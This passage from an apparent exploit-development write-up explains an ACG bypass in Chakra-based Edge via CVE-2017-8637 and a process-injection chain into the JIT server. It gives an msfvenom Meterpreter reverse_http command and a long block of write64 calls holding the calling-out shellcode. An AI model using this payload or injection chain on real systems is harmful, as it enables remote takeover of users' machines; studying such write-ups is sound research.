The last thing to note, however, is where Matt says that the JIT process was moved “…into a separate process that runs in its own isolated sandbox”. Notice how Matt did not say that it was moved into an ACG-compliant process (as we know, ACG isn’t compatible with JIT). Although the JIT process may be “sandboxed” it does not have ACG enabled. It does, however, have CIG and “no child processes” enabled. We will be taking advantage of the fact the JIT process doesn’t (and still to this day doesn’t, although the new V8 version of Edge only has ACG support in a special mode) have ACG enabled. With our ACG bypass, we will leverage a vulnerability with the way Chakra-based Edge managed communications (specifically via process a handle stored within the content process) to and from the JIT server. With that said, let’s move on.

Leaking The JIT Server Handle

The content process uses an RPC channel in order to communicate with the JIT server/process. I found this out by opening chakra.dll within IDA and searching for any functions which looked interesting and contained the word “JIT”. I found an interesting function named JITManager::ConnectRpcServer. What stood out to me immediately was a call to the function DuplicateHandle within JITManager::ConnectRpcServer.

If we look at ChakraCore we can see the source (which should be close between Chakra and ChakraCore) for this function. What was very interesting about this function is the fact that the first argument this function accepts is seemingly a “handle to the JIT process”.

Since chakra.dll contains the functionality of the Chakra JavaScript engine and since chakra.dll, as we know, is loaded into the content process - this functionality is accessible through the content process (where our exploit is running). This infers at some point the content process is doing something with what seems to be a handle to the JIT server. However, we know that the value of jitProcessHandle is supplied by the caller (e.g. the function which actually invokes JITManager::ConnectRpcServer). Using IDA, we can look for cross-references to this function to see what function is responsible for calling JITManager::ConnectRpcServer.

Taking a look at the above image, we can see the function ScriptEngine::SetJITConnectionInfo is responsible for calling JITManager::ConnectRpcServer and, thus, also for providing the JIT handle to the function. Let’s look at ScriptEngine::SetJITConnectionInfo to see exactly how this function provides the JIT handle to JITManager::ConnectRpcServer.

We know that the __fastcall calling convention is in use, and that the first argument of JITManager::ConnectRpcServer (as we saw in the ChakraCore code) is where the JIT handle goes. So, if we look at the above image, whatever is in RCX directly prior to the call to JITManager::ConnectRpcServer will be the JIT handle. We can see this value is gathered from a symbol called s_jitManager.

We know that this is the value that is going to be passed to the JITManager::ConnectRpcServer function in the RCX register - meaning that this symbol has to contain the handle to the JIT server. Let’s look again, once more, at JITManager::ConnectRpcServer (this time with some additional annotation).

We already know that RCX = s_jitManager when this function is executed. Looking deeper into the disassembly (almost directly before the DuplicateHandle call) we can see that s_jitManager+0x8 (a.k.a RCX at an offset of 0x8) is loaded into R14. R14 is then used as the lpTargetHandle parameter for the call to DuplicateHandle. Let’s take a look at DuplicateHandle’s prototype (don’t worry if this is confusing, I will provide a summation of the findings very shortly to make sense of this).

If we take a look at the description above, the lpTargetHandle will “…receive the duplicate handle…”. What this means is that DuplicateHandle is used in this case to duplicate a handle to the JIT server, and store the duplicated handle within s_jitManager+0x8 (a.k.a the content process will have a handle to the JIT server) We can base this on two things - the first being that we have anecdotal evidence through the name of the variable we located in ChakraCore, which is jitprocessHandle. Although Chakra isn’t identical to ChakraCore in every regard, Chakra is following the same convention here. Instead, however, of directly supplying the jitprocessHandle - Chakra seems to manage this information through a structure called s_jitManager. The second way we can confirm this is through hard evidence.

If we examine chakra!JITManager::s_jitManager+0x8 (where we have hypothesized the duplicated JIT handle will go) within WinDbg, we can clearly see that this is a handle to a process with PROCESS_DUP_HANDLE access. We can also use Process Hacker to examine the handles to and from MicrosoftEdgeCP.exe. First, run Process Hacker as an administrator. From there, double-click on the MicrosoftEdgeCP.exe content process (the one using the most RAM as we saw, PID 4172 in this case). From there, click on the Handles tab and then sort the handles numerically via the Handle tab by clicking on it until they are in ascending order.

If we then scroll down in this list of handles, we can see our handle of 0x314. Looking at the Name column, we can also see that this is a handle to another MicrosoftEdgeCP.exe process. Since we know there are only two (whenever exploit.html is spawned and no other tabs are open) instances of MicrosoftEdgeCP.exe, the other “content process” (as we saw earlier) must be our JIT server (PID 7392)!

Another way to confirm this is by clicking on the General tab of our content process (PID 4172). From there, we can click on the Details button next to Mitigation policies to confirm that ACG (called “Dynamic code prohibited” here) is enabled for the content process where our exploit is running.

However, if we look at the other content process (which should be our JIT server) we can confirm ACG is not running. Thus, indicating, we know exactly which process is our JIT server and which one is our content process. From now on, no matter how many instances of Edge are running on a given machine, a content process will always have a PROCESS_DUP_HANDLE handle to the JIT server located at chakra::JITManager::s_jitManager+0x8.

So, in summation, we know that s_jitManager+0x8 contains a handle to the JIT server, and it is readable from the content process (where our exploit is running). You may also be asking “why does the content process need to have a PROCESS_DUP_HANDLE handle to the JIT server?” We will come to this shortly.

Turning our attention back to the aforementioned analysis, we know we have a handle to the JIT server. You may be thinking - we could essentially just use our arbitrary read primitive to obtain this handle and then use it to perform some operations on the JIT process, since the JIT process doesn’t have ACG enabled! This may sound very enticing at first. However, let’s take a look at a malicious function like VirtualAllocEx for a second, which can allocate memory within a remote process via a supplied process handle (which we have). VirtualAllocEx documentation states that:

The handle must have the PROCESS_VM_OPERATION access right. For more information, see Process Security and Access Rights.

This “kills” our idea in its tracks - the handle we have only has the permission PROCESS_DUP_HANDLE. We don’t have the access rights to allocate memory in a remote process where perhaps ACG is disabled (like the JIT server). However, due to a vulnerability (CVE-2017-8637), there is actually a way we can abuse the handle stored within s_jitManager+0x8 (which is a handle to the JIT server). To understand this, let’s just take a few moments to understand why we even need a handle to the JIT server, from the content process, in the first place.

Let’s now turn out attention to this this Google Project Zero issue regarding the CVE.

We know that the JIT server (a different process) needs to map JIT’d code into the content process. As the issue explains:

In order to be able to map executable memory in the calling process, JIT process needs to have a handle of the calling process. So how does it get that handle? It is sent by the calling process as part of the ThreadContext structure. In order to send its handle to the JIT process, the calling process first needs to call DuplicateHandle on its (pseudo) handle.

The above is self explanatory. If you want to do process injection (e.g. map code into another process) you need a handle to that process. So, in the case of the JIT server - the JIT server knows it is going to need to inject some code into the content process. In order to do this, the JIT server needs a handle to the content process with permissions such as PROCESS_VM_OPERATION. So, in order for the JIT process to have a handle to the content process, the content process (as mentioned above) shares it with the JIT process. However, this is where things get interesting.

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle. According to Microsoft, a pseudo handle:

… is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.

So, in other words, a pseudo handle is a handle to the current process and it is only valid within context of the process it is generated in. So, for example, if the content process called GetCurrentProcess to obtain a pseudo handle which represents the content process (essentially a handle to itself), this pseudo handle wouldn’t be valid within the JIT process. This is because the pseudo handle only represents a handle to the process which called GetCurrentProcess. If GetCurrentProcess is called in the JIT process, the handle generated is only valid within the JIT process. It is just an “easy” way for a process to specify a handle to the current process. If you supplied this pseudo handle in a call to WriteProcessMemory, for instance, you would tell WriteProcessMemory “hey, any memory you are about to write to is found within the current process”. Additionally, this pseudo handle has PROCESS_ALL_ACCESS permissions.

Now that we know what a pseudo handle is, let’s revisit this sentiment:

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle.

What the content process will do is obtain its pseudo handle by calling GetCurrentProcess (which is only valid within the content process). This handle is then used in a call to DuplicateHandle. In other words, the content process will duplicate its pseudo handle. You may be thinking, however, “Connor you just told me that a pseudo handle can only be used by the process which called GetCurrentProcess. Since the content process called GetCurrentProcess, the pseudo handle will only be valid in the content process. We need a handle to the content process that can be used by another process, like the JIT server. How does duplicating the handle change the fact this pseudo handle can’t be shared outside of the content process, even though we are duplicating the handle?”

The answer is pretty straightforward - if we look in the GetCurrentProcess Remarks section we can see the following text:

A process can create a “real” handle to itself that is valid in the context of other processes, or that can be inherited by other processes, by specifying the pseudo handle as the source handle in a call to the DuplicateHandle function.

So, even though the pseudo handle only represents a handle to the current process and is only valid within the current process, the DuplicateHandle function has the ability to convert this pseudo handle, which is only valid within the current process (in our case, the current process is the content process where the pseudo handle to be duplicated exists) into an actual or real handle which can be leveraged by other processes. This is exactly why the content process will duplicate its pseudo handle - it allows the content process to create an actual handle to itself, with PROCESS_ALL_ACCESS permissions, which can be actively used by other processes (in our case, this duplicated handle can be used by the JIT server to map JIT’d code into the content process).

So, in totality, its possible for the content process to call GetCurrentProcess (which returns a PROCESS_ALL_ACCESS handle to the content process) and then use DuplicateHandle to duplicate this handle for the JIT server to use. However, where things get interesting is the third parameter of DuplicateHandle, which is hTargetProcessHandle. This parameter has the following description:

A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right…

In our case, we know that the “process that is to receive the duplicated handle” is the JIT server. After all, we are trying to send a (duplicated) content process handle to the JIT server. This means that when the content process calls DuplicateHandle in order to duplicate its handle for the JIT server to use, according to this parameter, the JIT server also needs to have a handle to the content process with PROCESS_DUP_HANDLE. If this doesn’t make sense, re-read the description provided of hTargetProcessHandle. This is saying that this parameter requires a handle to the process where the duplicated handle is going to go (specifically a handle with PROCESS_DUP_HANDLE) permissions.

This means, in less words, that if the content process wants to call DuplicateHandle in order to send/share its handle to/with the JIT server so that the JIT server can map JIT’d code into the content process, the content process also needs a PROCESS_DUP_HANDLE to the JIT server.

This is the exact reason why the s_jitManager structure in the content process contains a PROCESS_DUP_HANDLE to the JIT server. Since the content process now has a PROCESS_DUP_HANDLE handle to the JIT server (s_jitManager+0x8), this s_jitManager+0x8 handle can be passed in to the hTargetProcessHandle parameter when the content process duplicates its handle via DuplicateHandle for the JIT server to use. So, to answer our initial question - the reason why this handle exists (why the content process has a handle to the JIT server) is so DuplicateHandle calls succeed where content processes need to send their handle to the JIT server!

As a point of contention, this architecture is no longer used and the issue was fixed according to Ivan:

This issue was fixed by using an undocumented system_handle IDL attribute to transfer the Content Process handle to the JIT Process. This leaves handle passing in the responsibility of the Windows RPC mechanism, so Content Process no longer needs to call DuplicateHandle() or have a handle to the JIT Process.

So, to beat this horse to death, let me concisely reiterate one last time:

  1. JIT process wants to inject JIT’d code into the content process. It needs a handle to the content process to inject this code
  2. In order to fulfill this need, the content process will duplicate its handle and pass it to the JIT server
  3. In order for a duplicated handle from process “A” (the content process) to be used by process “B” (the JIT server), process “B” (the JIT server) first needs to give its handle to process “A” (the content process) with PROCESS_DUP_HANDLE permissions. This is outlined by hTargetProcessHandle which requires “a handle to the process that is to receive the duplicated handle” when the content process calls DuplicateHandle to send its handle to the JIT process
  4. Content process first stores a handle to the JIT server with PROCESS_DUP_HANDLE to fulfill the needs of hTargetProcessHandle
  5. Now that the content process has a PROCESS_DUP_HANDLE to the JIT server, the content process can call DuplicateHandle to duplicate its own handle and pass it to the JIT server
  6. JIT server now has a handle to the content process

The issue with this is number three, as outlined by Microsoft:

A process that has some of the access rights noted here can use them to gain other access rights. For example, if process A has a handle to process B with PROCESS_DUP_HANDLE access, it can duplicate the pseudo handle for process B. This creates a handle that has maximum access to process B. For more information on pseudo handles, see GetCurrentProcess.

What Microsoft is saying here is that if a process has a handle to another process, and that handle has PROCESS_DUP_HANDLE permissions, it is possible to use another call to DuplicateHandle to obtain a full-fledged PROCESS_ALL_ACCESS handle. This is the exact scenario we currently have. Our content process has a PROCESS_DUP_HANDLE handle to the JIT process. As Microsoft points out, this can be dangerous because it is possible to call DuplicateHandle on this PROCESS_DUP_HANDLE handle in order to obtain a full-access handle to the JIT server! This would allow us to have the necessary handle permissions, as we showed earlier with VirtualAllocEx, to compromise the JIT server. The reason why CVE-2017-8637 is an ACG bypass is because the JIT server doesn’t have ACG enabled! If we, from the content process, can allocate memory and write shellcode into the JIT server (abusing this handle) we would compromise the JIT process and execute code, because ACG isn’t enabled there!

So, we could setup a call to DuplicateHandle as such:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// Ignored since we later specify DUPLICATE_SAME_ACCESS
	0,			// FALSE (handle can't be inherited)
	DUPLICATE_SAME_ACCESS	// Create handle with same permissions as source handle (source handle = GetCurrentProcessHandle() so PROCESS_ALL_ACCESS permissions)
);

Let’s talk about where these parameters came from.

  1. hSourceProcessHandle - “A handle to the process with the handle to be duplicated. The handle must have the PROCESS_DUP_HANDLE access right.”
    • The value we are passing here is jitHandle (which represents our PROCESS_DUP_HANDLE to the JIT server). As the parameter description says, we pass in the handle to the process where the “handle we want to duplicate exists”. Since we are passing in the PROCESS_DUP_HANDLE to the JIT server, this essentially tells DuplicateHandle that the handle we want to duplicate exists somewhere within this process (the JIT process).
  2. hSourceHandle - “The handle to be duplicated. This is an open object handle that is valid in the context of the source process.”
    • We supply a value of GetCurrentProcess here. What this means is that we are asking DuplicateHandle to duplicate a pseudo handle to the current process. In other words, we are asking DuplicateHandle to duplicate us a PROCESS_ALL_ACCESS handle. However, since we have passed in the JIT server as the hSourceProcessHandle parameter we are instead asking DuplicateHandle to “duplicate us a pseudo handle for the current process”, but we have told DuplicateHandl that our “current process” is the JIT process as we have changed our “process context” by telling DuplicateHandle to perform this operation in context of the JIT process. Normally GetCurrentProcess would return us a handle to the process in which the function call occurred in (which, in our exploit, will obviously happen within a ROP chain in the content process). However, we use the “trick” up our sleeve, which is the leaked handle to the JIT server we have stored in the content process. When we supply this handle, we “trick” DuplicateHandle into essentially duplicating a PROCESS_ALL_ACCESS handle within the JIT process instead.
  3. hTargetProcessHandle - “A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right.”
    • We supply a value of GetCurrentProcess here. This makes sense, as we want to receive the full handle to the JIT server within the content process. Our exploit is executing within the content process so we tell DuplicateHandle that the process we want to receive this handle in context of is the current, or content process. This will allow the content process to use it later.
  4. lpTargetHandle - “A pointer to a variable that receives the duplicate handle. This handle value is valid in the context of the target process. If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.”
    • This is the most important part. Not only is this the variable that will receive our handle (fulljitHandle just represents a memory address where we want to store this handle. In our exploit we will just find an empty .data address to store it in), but the second part of the parameter description is equally as important. We know that for hSourceHandle we supplied a pseudo handle via GetCurrentProcess. This description essentially says that DuplicateHandle will convert this pseudo handle in hSourceHandle into a real handle when the function completes. As we mentioned, we are using a “trick” with our hSourceProcessHandle being the JIT server and our hSourceHandle being a pseudo handle. We, as mentioned, are telling Edge to search within the JIT process for a pseudo handle “to the current process”, which is the JIT process. However, a pseudo handle would really only be usable in context of the process where it was being obtained from. So, for instance, if we obtained a pseudo handle to the JIT process it would only be usable within the JIT process. This isn’t ideal, because our exploit is within the content process and any handle that is only usable within the JIT process itself is useless to us. However, since DuplicateHandle will convert the pseudo handle to a real handle, this real handle is usable by other processes. This essentially means our call to DuplicateHandle will provide us with an actual handle with PROCESS_ALL_ACCESS to the JIT server from another process (from the content process in our case).
  5. dwDesiredAccess - “The access requested for the new handle. For the flags that can be specified for each object type, see the following Remarks section. This parameter is ignored if the dwOptions parameter specifies the DUPLICATE_SAME_ACCESS flag…”
    • We will be supplying the DUPLICATE_SAME_ACCESS flag later, meaning we can set this to 0.
  6. bInheritHandle - “A variable that indicates whether the handle is inheritable. If TRUE, the duplicate handle can be inherited by new processes created by the target process. If FALSE, the new handle cannot be inherited.”
    • Here we set the value to FALSE. We don’t want to/nor do we care if this handle is inheritable.
  7. dwOptions - “Optional actions. This parameter can be zero, or any combination of the following values.”
    • Here we provide 2, or DUPLICATE_SAME_ACCESS. This instructs DuplicateHandle that we want our duplicate handle to have the same permissions as the handle provided by the source. Since we provided a pseudo handle as the source, which has PROCESS_ALL_ACCESS, our final duplicated handle fulljitHandle will have a real PROCESS_ALL_ACCESS handle to the JIT server which can be used by the content process.

If this all sounds confusing, take a few moments to keep reading the above. Additionally, here is a summation of what I said:

  1. DuplicateHandle let’s you decide in what process the handle you want to duplicate exists. We tell DuplicateHandle that we want to duplicate a handle within the JIT process, using the low-permission PROCESS_DUP_HANDLE handle we have leaked from s_jitManager.
  2. We then tell DuplicateHandle the handle we want to duplicate within the JIT server is a GetCurrentProcess pseudo handle. This handle has PROCESS_ALL_ACCESS
  3. Although GetCurrentProcess returns a handle only usable by the process which called it, DuplicateHandle will perform a conversion under the hood to convert this to an actual handle which other processes can use
  4. Lastly, we tell DuplicateHandle we want a real handle to the JIT server, which we can use from the content process, with PROCESS_ALL_ACCESS permissions via the DUPLICATE_SAME_ACCESS flag which will tell DuplicateHandle to duplicate the handle with the same permissions as the pseudo handle (which is PROCESS_ALL_ACCESS).

Again, just keep re-reading over this and thinking about it logically. If you still have questions, feel free to email me. It can get confusing pretty quickly (at least to me).

Now that we are armed with the above information, it is time to start outline our exploitation plan.

Exploitation Plan 2.0

Let’s briefly take a second to rehash where we are at:

  1. We have an ASLR bypass and we know the layout of memory
  2. We can read/write anywhere in memory as much or as little as we want
  3. We can direct program execution to wherever we want in memory
  4. We know where the stack is and can force Edge to start executing our ROP chain

However, we know the pesky mitigations of ACG, CIG, and “no child processes” are still in our way. We can’t just execute our payload because we can’t make our payload as executable. So, with that said, the first option one could take is using a pure data-only attack. We could programmatically, via ROP, build out a reverse shell. This is very cumbersome and could take thousands of ROP gadgets. Although this is always a viable alternative, we want to detonate actual shellcode somehow. So, the approach we will take is as follows:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process
  2. ACG is disabled within the JIT process. Use our ability to execute a ROP chain in the content process to write our payload to the JIT process
  3. Execute our payload within the JIT process to obtain shellcode execution (essentially perform process injection to inject a payload to the JIT process where ACG is disabled)

To break down how we will actually accomplish step 2 in even greater detail, let’s first outline some stipulations about processes protected by ACG. We know that the content process (where our exploit will execute) is protected by ACG. We know that the JIT server is not protected by ACG. We already know that a process not protected by ACG is allowed to inject into a process that is protected by ACG. We clearly see this with the out-of-process JIT architecture of Edge. The JIT server (not protected by ACG) injects code into the content process (protected by ACG) - this is expected behavior. However, what about a injection from a process that is protected by ACG into a process that is not protected by ACG (e.g. injection from the content process into the JIT process, which we are attempting to do)?

This is actually prohibited (with a slight caveat). A process that is protected by ACG is not allowed to directly inject RWX memory and execute it within a process not protected by ACG. This makes sense, as this stipulation “protects” against an attacker compromising the JIT process (ACG disabled) from the content process (ACG enabled). However, we mentioned the stipulation is only that we cannot directly embed our shellcode as RWX memory and directly execute it via a process injection call stack like VirtualAllocEx (allocate RWX memory within the JIT process) -> WriteProcessMemory -> CreateRemoteThread (execute the RWX memory in the JIT process). However, there is a way we can bypass this stipulation.

Instead of directly allocating RWX memory within the JIT process (from the content process) we could instead just write a ROP chain into the JIT process. This doesn’t require RWX memory, and only requires RW memory. Then, if we could somehow hijack control-flow of the JIT process, we could have the JIT process execute our ROP chain. Since ACG is disabled in the JIT process, our ROP chain could mark our shellcode as RWX instead of directly doing it via VirtualAllocEx! Essentially, our ROP chain would just be a “traditional” one used to bypass DEP in the JIT process. This would allow us to bypass ACG! This is how our exploit chain would look:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process (this allows us to invoke memory operations on the JIT server from the content process)
  2. Allocate memory within the JIT process via VirtualAllocEx and the above handle
  3. Write our final shellcode (a reflective DLL from Meterpreter) into the allocation (our shellcode is now in the JIT process as RW)
  4. Create a thread within the JIT process via CreateRemoteThread, but create this thread as suspended so it doesn’t execute and have the start/entry point of our thread be a ret ROP gadget
  5. Dump the CONTEXT structure of the thread we just created (and now control) in the JIT process via GetThreadContext to retrieve its stack pointer (RSP)
  6. Use WriteProcessMemory to write the “final” ROP chain into the JIT process by leveraging the leaked stack pointer (RSP) of the thread we control in the JIT process from our call to GetThreadContext. Since we know where the stack is for our thread we created, from GetThreadContext, we can directly write a ROP chain to it with WriteProcessMemory and our handle to the JIT server. This ROP chain will mark our shellcode, which we already injected into the JIT process, as RWX (this ROP chain will work just like any traditional ROP chain that calls VirtualProtect)
  7. Update the instruction pointer of the thread we control to return into our ROP chains
  8. Call ResumeThread. This call will kick off execution of our thread, which has its entry point set to a return routine to start executing off of the stack, where our ROP chain is
  9. Our ROP chain will mark our shellcode as RWX and will jump to it and execute it

Lastly, I want to quickly point out the old Advanced Windows Exploitation syllabus from Offensive Security. After reading the steps outlined in this syllabus, I was able to formulate my aforementioned exploitation path off of the ground work laid here. As this blog post continues on, I will explain some of the things I thought would work at first and how the above exploitation path actually came to be. Although the syllabus I read was succinct and concise, I learned as I developing my exploit some additional things Control Flow Guard checks which led to many more ROP chains than I would have liked. As this blog post goes on, I will explain my thought process as to what I thought would work and what actually worked.

If the above steps seem a bit confusing - do not worry. We will dedicate a section to each concept in the rest of the blog post. You have gotten through a wall of text and, if you have made it to this point, you should have a general understanding of what we are trying to accomplish. Let’s now start implementing this into our exploit. We will start with our shellcode.

Shellcode

The first thing we need to decide is what kind of shellcode we want to execute. What we will do is store our shellcode in the .data section of chakra.dll within the content process. This is so we know its location when it comes time to inject it into the JIT process. So, before we begin our ROP chain, we need to load our shellcode into the content process so we can inject it into the JIT process. A typical example of a reverse shell, on Windows, is as follows:

  1. Create an instance of cmd.exe
  2. Using the socket library of the Windows API to put the I/O for cmd.exe on a socket, making the cmd.exe session remotely accessible over a network connection.

We can see this within the Metasploit Framework

Here is the issue - within Edge, we know there is a “no child processes” mitigation. Since a reverse shell requires spawning an instance of cmd.exe from the code calling it (our exploit), we can’t just use a normal reverse shell. Another way we could load code into the process space is through a DLL. However, remember that even though ACG is disabled in the JIT process, the JIT process still has Code Integrity Guard (CIG) enabled - meaning we can’t just use our payload to download a DLL to disk and then load it with LoadLibraryA. However, let’s take a further look at CIG’s documentation. Specifically regarding the Mitigation Bypass and Bounty for Defense Terms. If we scroll down to the “Code integrity mitigations”, we can take a look at what Microsoft deems to be out-of-scope.

If the image above is hard to view, open it in a new tab. As we can see Microsoft says that “in-memory injection” is out-of-scope of bypassing CIG. This means Microsoft knows this is an issue that CIG doesn’t address. There is a well-known technique known as reflective DLL injection where an adversary can use pure shellcode (a very large blob of shellcode) in order to load an entire DLL (which is unsigned by Microsoft) in memory, without ever touching disk. Red teamers have beat this concept to death, so I am not going to go in-depth here. Just know that we need to use reflective DLL because we need a payload which doesn’t spawn other processes.

Most command-and-control frameworks, like the one we will use (Meterpreter), use reflective DLL for their post-exploitation capabilities. There are two ways to approach this - staged and stageless. Stageless payloads will be a huge blob of shellcode that not only contain the DLL itself, but a routine that injects that DLL into memory. The other alternative is a staged payload - which will use a small first-stage shellcode which calls out to a command-and-control server to fetch the DLL itself to be injected. For our purposes, we will be using a staged reflective DLL for our shellcode.

To be more simple - we will be using the windows/meterpreter/x64/reverse_http payload from Metasploit. Essentially you can opt for any shellcode to be injected which doesn’t fork a new process.

The shellcode can be generated as follows: msfvenom -p windows/x64/meterpreter/reverse_http LHOST=YOUR_SERVER_IP LPORT=443 -f c

What I am about to explain next is (arguably) the most arduous part of this exploit. We know that in our exploit JavaScript limits us to 32-bit boundaries when reading and writing. So, this means we have to write our shellcode 4 bytes at a time. So, in order to do this, we need to divide up our exploit into 4-byte “segments”. I did this manually, but later figured out how to slightly automate getting the shellcode correct.

To “automate” this, we first need to get our shellcode into one contiguous line. Save the shellcode from the msfvenom output in a file named shellcode.txt.

Once the shellcode is in shellcode.txt, we can use the following one liner:

awk '{printf "%s""",$0}' shellcode.txt | sed 's/"//g' | sed 's/;//g' | sed 's/$/0000/' |  sed -re 's/\\x//g1' | fold -w 2 | tac | tr -d "\n" | sed 's/.\{8\}/& /g' | awk '{ for (i=NF; i>1; i--) printf("%s ",$i); print $1; }' | awk '{ for(i=1; i<=NF; i+=2) print $i, $(i+1) }' | sed 's/ /, /g' | sed 's/[^ ]* */0x&/g' | sed 's/^/write64(chakraLo+0x74b000+countMe, chakraHigh, /' | sed 's/$/);/' | sed 's/$/\ninc();/'

This will take our shellcode and divide it into four byte segments, remove the \x characters, get them in little endian format, and put them in a format where they will more easily be ready to be placed into our exploit.

Your output should look something like this:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
inc();
